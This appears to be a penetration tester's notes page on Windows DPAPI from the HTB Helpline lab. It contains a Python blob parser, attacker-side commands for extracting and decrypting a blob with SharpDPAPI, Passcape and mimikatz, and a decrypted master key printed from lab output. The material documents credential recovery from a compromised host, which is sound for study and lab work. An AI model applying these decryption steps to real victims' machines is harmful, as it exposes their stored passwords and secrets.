DPAPI (Data Protection API)

windows, crypto

Overview #

Every DPAPI blob starts with the version DWORD (01 00 00 00) followed by the provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}, stored in Windows mixed-endian byte order. This 20-byte signature is the quickest way to recognise a DPAPI blob in a file, registry value or memory dump:

01 00 00 00 D0 8C 9D DF 01 15 D1 11 8C 7A 00 C0 4F C2 97 EB
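The following parser walks the rest of the blob after that signature and pulls out the fields a pentester needs before decryption, above all the master key GUID and the cipher/hash algorithm IDs, which is what mimikatz's `dpapi::blob` prints. It is an added example, not code from these notes, mimikatz or SharpDPAPI; the field layout is the publicly documented DPAPI_BLOB structure, and the sample blob built by `build_sample_blob()` is constructed here for illustration (it reuses the master key GUID from the Helpline output below and is not a real capture).

```python
"""Parse a Windows DPAPI blob (the output of CryptProtectData) offline.

Added example, not code from the original notes or from mimikatz/SharpDPAPI.
The field layout is the publicly documented DPAPI_BLOB structure that
mimikatz's dpapi::blob walks; the sample blob at the bottom is constructed
here for illustration, not a real capture.
"""
import struct
import uuid

# Provider GUID that follows the version DWORD in every DPAPI blob
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values commonly seen in DPAPI blobs
ALG_NAMES = {
    0x6603: "CALG_3DES",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800E: "CALG_SHA_512",
}


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _guid(buf, off):
    # GUIDs are stored in Windows mixed-endian order: Data1..3 little-endian
    if off + 16 > len(buf):
        raise ValueError("truncated GUID")
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def _counted(buf, off):
    # DWORD length followed by that many bytes
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length field runs past end of blob")
    return bytes(buf[off:off + n]), off + n


def parse_dpapi_blob(buf):
    """Return the blob's fields as a dict; raise ValueError if it is not a DPAPI blob."""
    off = 0
    version, off = _u32(buf, off)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob: bad version or provider GUID")
    mk_version, off = _u32(buf, off)
    mk_guid, off = _guid(buf, off)          # which master key file decrypts this blob
    flags, off = _u32(buf, off)
    description, off = _counted(buf, off)   # UTF-16LE, NUL terminated
    alg_crypt, off = _u32(buf, off)
    alg_crypt_bits, off = _u32(buf, off)
    salt, off = _counted(buf, off)
    hmac_key, off = _counted(buf, off)      # usually empty
    alg_hash, off = _u32(buf, off)
    alg_hash_bits, off = _u32(buf, off)
    hmac2_key, off = _counted(buf, off)     # usually empty
    data, off = _counted(buf, off)          # the ciphertext
    sign, off = _counted(buf, off)          # HMAC over the blob
    if off != len(buf):
        raise ValueError("%d trailing bytes after signature" % (len(buf) - off))
    return {
        "version": version,
        "master_key_version": mk_version,
        "master_key_guid": "{%s}" % mk_guid,
        "flags": flags,
        "description": description.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_bits,
        "salt": salt.hex(),
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_bits": alg_hash_bits,
        "data_len": len(data),
        "sign_len": len(sign),
    }


def build_sample_blob():
    """Constructed sample blob (not a real capture) using the master key GUID from these notes."""
    def counted(b):
        return struct.pack("<I", len(b)) + b
    master_key = uuid.UUID("98fafef2-d8a0-4b4f-917d-d8a1f5889c81")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + master_key.bytes_le
            + struct.pack("<I", 0)
            + counted("Local Credential Data\x00".encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256)
            + counted(bytes(range(32)))      # salt
            + counted(b"")                   # hmac key
            + struct.pack("<II", 0x800E, 512)
            + counted(b"")                   # hmac2 key
            + counted(b"\xaa" * 48)          # ciphertext (dummy)
            + counted(b"\xbb" * 64))         # signature (dummy)


if __name__ == "__main__":
    for k, v in parse_dpapi_blob(build_sample_blob()).items():
        print("%-20s %s" % (k, v))
```

Run it against a real blob with `parse_dpapi_blob(open("blob.bin", "rb").read())`; the `master_key_guid` it returns is the file name to look for under the victim's Protect directory, and a `ValueError` on the first two fields means the bytes you extracted are not a raw DPAPI blob (for example, still hex-encoded).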

Relationship between different Windows security mechanism #

Decryption Overview #

Decrypting a DPAPI Blob using Passcape #

Enter the blob. I got the blob by converting the content of the XML file into a bin file, then transferred it to the Windows 10 VM.

# From attacker: the XML carries the blob as a hex string; xxd -r -p turns it back into raw bytes
cat admin-pass.xml | xxd -r -p > blob.bin

At this point, the software automatically detects the master key GUID to use. I also transferred the victim's CREDHIST file to my Windows 10 VM.

Then I needed the user's SID from the mimikatz output. The password, well, I got that from the registry.

Unfortunately, I only have a trial version of the program, so it only showed the first 10 characters of the decrypted data.

But this is a good thing, because at least now I know there is a way to recover some data from the DPAPI blob. I was also able to validate which master key GUID and CREDHIST correspond to the blob.

The next question is, what alternative tool can I use?

# SharpDPAPI decrypts the blob offline given the master key as {GUID}:SHA1, i.e. the GUID and sha1(key) that mimikatz prints for the decrypted master key
.\SharpDPAPI.exe blob /target:blob.bin '{98fafef2-d8a0-4b4f-917d-d8a1f5889c81}:DB6A7CB1AE10BFD70EA9BD8A4D10608A08D0969F'

Mimikatz Commands #

# Parses and shows the structure of the blob (master key GUID, algorithms, field lengths) without decrypting it
dpapi::blob /in:blob.bin

Master Key Characteristics #

Here is an example from the HTB Helpline mimikatz output:

# The GUID is also the file name of the master key file under
# `AppData\Roaming\Microsoft\Protect\<SID>\`
* GUID      :  {98fafef2-d8a0-4b4f-917d-d8a1f5889c81}

# The decrypted master key itself, 64 bytes as hex
* MasterKey :  daae4d9c34452f4bc6a17ccf4d87c369a15fcd5f81be5fc7211721a321f309392578ec1c225647cc2048d90854c7d94224cde619e23e04a0dbbaddb19efdf305

# SHA1 of the raw master key bytes; this is the value SharpDPAPI takes as {GUID}:SHA1
* sha1(key) :  db6a7cb1ae10bfd70ea9bd8a4d10608a08d0969f

Tools #

References #